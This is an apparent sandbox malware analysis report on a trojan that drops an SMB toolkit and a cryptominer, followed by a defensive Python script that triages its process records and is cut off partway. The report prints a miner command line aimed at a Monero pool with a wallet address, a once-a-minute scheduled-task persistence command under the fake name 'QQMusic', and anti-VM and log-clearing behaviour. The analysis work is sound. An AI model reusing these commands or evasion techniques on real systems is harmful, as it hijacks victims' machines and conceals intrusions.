Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5864:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1528:120:WilError_01
Source: C:\ProgramData\SMB.exe Command line argument: sfxname 37_2_0133C130
Source: C:\ProgramData\SMB.exe Command line argument: sfxstime 37_2_0133C130
Source: C:\ProgramData\SMB.exe Command line argument: STARTDLG 37_2_0133C130
Source: C:\ProgramData\SMB.exe File written: C:\ProgramData\Shellcode.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static file information: File size 9402368 > 1048576
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2b8e00
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x53aa00
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: More than 200 imports for KERNEL32.dll
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: More than 200 imports for USER32.dll
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: SMB.exe, 00000025.00000002.334719426.0000000001350000.00000002.00000001.01000000.00000005.sdmp, SMB.exe, 00000025.00000000.283876071.0000000001350000.00000002.00000001.01000000.00000005.sdmp, SMB.exe, 00000040.00000000.301017387.0000000001350000.00000002.00000001.01000000.00000005.sdmp, SMB.exe, 00000040.00000002.604463756.0000000001350000.00000002.00000001.01000000.00000005.sdmp
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_005FB406 push ecx; ret 0_2_005FB419
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_005FB5F6 push ecx; ret 0_2_005FB609
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133D856 push ecx; ret 37_2_0133D869
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133CDF0 push eax; ret 37_2_0133CE0E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0041E5E0 LoadLibraryA,GetProcAddress,FreeLibrary,GetProcessHeap,InternalGetTcpTable2,GetProcessHeap,HeapFree,FreeLibrary,htons,inet_ntoa,GetCurrentProcessId,Sleep,lstrcmpiA,lstrcmpiA,wsprintfA,WinExec,Sleep,DeleteFileA,lstrcmpiA,wsprintfA,WinExec,Sleep,DeleteFileA,GetProcessHeap,HeapFree,FreeLibrary, 0_2_0041E5E0
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: section name: .giats
Source: spread.txt.0.dr Static PE information: section name: .giats
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\__tmp_rar_sfx_access_check_6810734
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\etchCore-0.x64.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\cnli-0.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\riar-2.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\svchostlong.exe
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\pcreposix-0.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\eteb-2.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\etebCore-2.x86.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\adfw.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\tibe.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\libcurl.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\libeay32.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\svchostromance.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe File created: C:\ProgramData\cywkjq.exe
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\tibe-1.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\ssleay32.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\etch-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe File created: C:\ProgramData\spread.txt
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\tibe-2.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\cnli-1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe File created: C:\ProgramData\SMB.exe
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\X86.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\exma-1.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\trch-0.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\crli-0.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\posh.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\pcrecpp-0.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\pcla-0.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\tucl-1.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\coli-0.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\tucl.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\X64.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\trfo-2.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\etchCore-0.x86.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\etebCore-2.x64.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\trfo-0.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\trch-1.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\dmgd-1.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\posh-0.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\libiconv-2.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\pcre-0.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\trfo.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\zibe.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\adfw-2.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\riar.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\serverlong.exe
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\xdvl-0.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\trch.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\zlib1.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\esco-0.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\ucl.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\iconv.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\libxml2.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\exma.dll
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\dmgd-4.dll

Boot Survival

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe /F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run QQMusic
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00421E00 OpenEventLogA,ClearEventLogA,CloseEventLog,DeleteFileA,RegOpenKeyExA,RegDeleteKeyA,RegDeleteKeyA,RegCloseKey,TerminateProcess,FindCloseChangeNotification,wsprintfA,WinExec,Sleep, 0_2_00421E00

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Stalling execution: Execution stalls by calling Sleep
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, spread.txt.0.dr Binary or memory string: DIR_WATCH.DLL
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, spread.txt.0.dr Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe TID: 5560 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe TID: 240 Thread sleep count: 34 > 30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe TID: 244 Thread sleep count: 56 > 30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe TID: 244 Thread sleep time: -560000s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe TID: 4264 Thread sleep time: -324000000s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe TID: 4812 Thread sleep count: 34 > 30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe TID: 6132 Thread sleep time: -60000s >= -30000s
Source: C:\ProgramData\SMB.exe Evasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Thread delayed: delay time: 18000000
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\etchCore-0.x64.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\cnli-0.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\riar-2.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\svchostlong.exe
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\pcreposix-0.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\adfw.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\eteb-2.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\etebCore-2.x86.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\tibe.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\libeay32.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\libcurl.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\svchostromance.exe
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\tibe-1.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\ssleay32.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\etch-0.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\tibe-2.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\cnli-1.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\X86.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\trch-0.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\exma-1.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\posh.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\crli-0.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\pcrecpp-0.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\pcla-0.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\tucl-1.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\coli-0.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\tucl.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\X64.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\trfo-2.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\etchCore-0.x86.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\etebCore-2.x64.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\trfo-0.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\trch-1.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\dmgd-1.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\posh-0.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\libiconv-2.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\pcre-0.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\trfo.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\zibe.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\adfw-2.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\riar.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\serverlong.exe
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\xdvl-0.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\trch.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\zlib1.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\esco-0.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\ucl.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\iconv.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\libxml2.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\exma.dll
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\dmgd-4.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe File opened / queried: VBoxMiniRdrDN
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Evaded block: after key decision
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 0_2_0041C2E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Thread delayed: delay time: 60000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_004054A0 GetModuleFileNameA,GetLogicalDriveStringsA,GetDriveTypeA,CreateThread,CloseHandle,Sleep, 0_2_004054A0
Source: C:\ProgramData\SMB.exe API call chain: ExitProcess graph end node
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, spread.txt.0.dr Binary or memory string: \\.\VBoxMiniRdrDN
Source: svchost.exe, 00000031.00000002.603833360.00000190E2A02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000031.00000002.603887710.00000190E2A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.604100531.000001D432E3E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003A.00000002.604007738.0000026DCAA29000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process information queried: ProcessInformation
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133C8D4 VirtualQuery,GetSystemInfo, 37_2_0133C8D4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00404F50 FindFirstFileA,lstrcmpiA,StrStrIA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Sleep,FindNextFileA,FindClose, 0_2_00404F50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00435442 __EH_prolog3_GS,GetFullPathNameA,__cftof,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,_strlen, 0_2_00435442
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_004055E0 _fwprintf,FindFirstFileA,wsprintfA,wsprintfA,Sleep,MoveFileExA,Sleep,SetFileAttributesA,_fwprintf,FindNextFileA,FindClose, 0_2_004055E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0042EB4F __EH_prolog3,_strlen,__cftof,FtpFindFirstFileA,FtpSetCurrentDirectoryA,FtpSetCurrentDirectoryA, 0_2_0042EB4F
Source: C:\ProgramData\SMB.exe Code function: 37_2_0132A2C3 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 37_2_0132A2C3
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133A536 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 37_2_0133A536
Source: C:\ProgramData\SMB.exe Code function: 37_2_01347D69 FindFirstFileExA, 37_2_01347D69
Source: C:\ProgramData\SMB.exe Code function: 37_2_01347E6F FindFirstFileExA,FindClose, 37_2_01347E6F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0041E5E0 LoadLibraryA,GetProcAddress,FreeLibrary,GetProcessHeap,InternalGetTcpTable2,GetProcessHeap,HeapFree,FreeLibrary,htons,inet_ntoa,GetCurrentProcessId,Sleep,lstrcmpiA,lstrcmpiA,wsprintfA,WinExec,Sleep,DeleteFileA,lstrcmpiA,wsprintfA,WinExec,Sleep,DeleteFileA,GetProcessHeap,HeapFree,FreeLibrary, 0_2_0041E5E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00642CD0 mov eax, dword ptr fs:[00000030h] 0_2_00642CD0
Source: C:\ProgramData\SMB.exe Code function: 37_2_013449FA mov eax, dword ptr fs:[00000030h] 37_2_013449FA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00638B0B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00638B0B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_005FB73F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_005FB73F
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133DB63 SetUnhandledExceptionFilter, 37_2_0133DB63
Source: C:\ProgramData\SMB.exe Code function: 37_2_01345B43 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 37_2_01345B43
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133DA15 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 37_2_0133DA15
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133DD1B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 37_2_0133DD1B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetWindowThreadProcessId,CreateToolhelp32Snapshot,Process32First,wsprintfA,FindCloseChangeNotification,Process32Next,CloseHandle, explorer.exe 0_2_0041F6E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
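The process-creation records above hold the whole behaviour of this sample in three command lines: an XMRig-style miner started against a stratum pool with a wallet address as the username, a scheduled task that relaunches the dropper every minute, and a repeated taskkill against the miner's own image. The following Python triage helper is an added example written for this page; it is not Joe Sandbox output and not code from the sample. It parses records in the report's "Source: ... Process created: ..." format, extracts pool, wallet, task schedule and kill targets, and flags the kill-and-respawn pattern. The sample records are the report's own lines copied into a constant; the Monero address heuristic (95 base58 characters starting with 4 or 8) and the threshold that treats a relaunch interval of five minutes or less as a watchdog are assumptions of this example.

```python
"""Triage of sandbox "Process created" records (added example, not Joe Sandbox code)."""
import re
from collections import Counter
from dataclasses import dataclass, field

# Constructed sample input: process-creation records copied from the report above
# (one of them still carries the "Jump to behavior" link text, which the parser drops).
SAMPLE_RECORDS = r"""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
"""

RECORD_RE = re.compile(
    r"^Source:\s+(?P<parent>\S+)\s+Process created:\s+(?P<image>\S+)\s+"
    r"(?P<cmdline>.*?)(?:\s+Jump to behavior)?\s*$"
)
POOL_RE = re.compile(r"stratum\+(?:tcp|ssl|tls)://(?P<host>[^\s:/]+):(?P<port>\d+)")
WALLET_RE = re.compile(r"(?:^|\s)-u\s+(?P<wallet>\S+)")
# Assumption: Monero standard address (starts with 4) or subaddress (starts with 8),
# 95 characters from the base58 alphabet, which has no 0, O, I or l.
XMR_ADDR_RE = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")
MINER_FLAGS = ("--max-cpu-usage", "--cpu-priority", "--cpu-max-threads-hint", "--donate-level")
SCHTASKS_OPT_RE = re.compile(r'/(?P<opt>sc|mo|tn|tr)\b\s+(?:"(?P<q>[^"]*)"|(?P<u>\S+))', re.I)
TASKKILL_RE = re.compile(r"/im\s+(?P<image>\S+)", re.I)
AGGRESSIVE_MINUTES = 5  # assumption: a relaunch every <= 5 minutes is a watchdog, not a job


@dataclass
class Findings:
    spawned: set = field(default_factory=set)            # image basenames seen as children
    miners: dict = field(default_factory=dict)           # basename -> pool/wallet details
    scheduled_tasks: list = field(default_factory=list)  # parsed schtasks /create options
    taskkills: Counter = field(default_factory=Counter)  # killed image -> count
    kill_respawn: set = field(default_factory=set)       # images both spawned and killed


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _as_int(value):
    try:
        return int(value)
    except (TypeError, ValueError):
        return None


def triage(records: str) -> Findings:
    f = Findings()
    for line in records.splitlines():
        m = RECORD_RE.match(line.strip())
        if not m:
            continue
        name, cmd = basename(m["image"]), m["cmdline"]
        f.spawned.add(name)
        pool = POOL_RE.search(cmd)
        if pool or any(flag in cmd for flag in MINER_FLAGS):
            wallet = WALLET_RE.search(cmd)
            f.miners[name] = {
                "pool": f"{pool['host']}:{pool['port']}" if pool else None,
                "wallet": wallet["wallet"] if wallet else None,
                "wallet_looks_monero": bool(wallet and XMR_ADDR_RE.match(wallet["wallet"])),
            }
        elif name == "schtasks.exe" and "/create" in cmd.lower():
            opts = {o["opt"].lower(): o["q"] if o["q"] is not None else o["u"]
                    for o in SCHTASKS_OPT_RE.finditer(cmd)}
            interval = _as_int(opts.get("mo"))
            opts["aggressive"] = (opts.get("sc", "").lower() == "minute"
                                  and interval is not None and interval <= AGGRESSIVE_MINUTES)
            f.scheduled_tasks.append(opts)
        elif name == "taskkill.exe":
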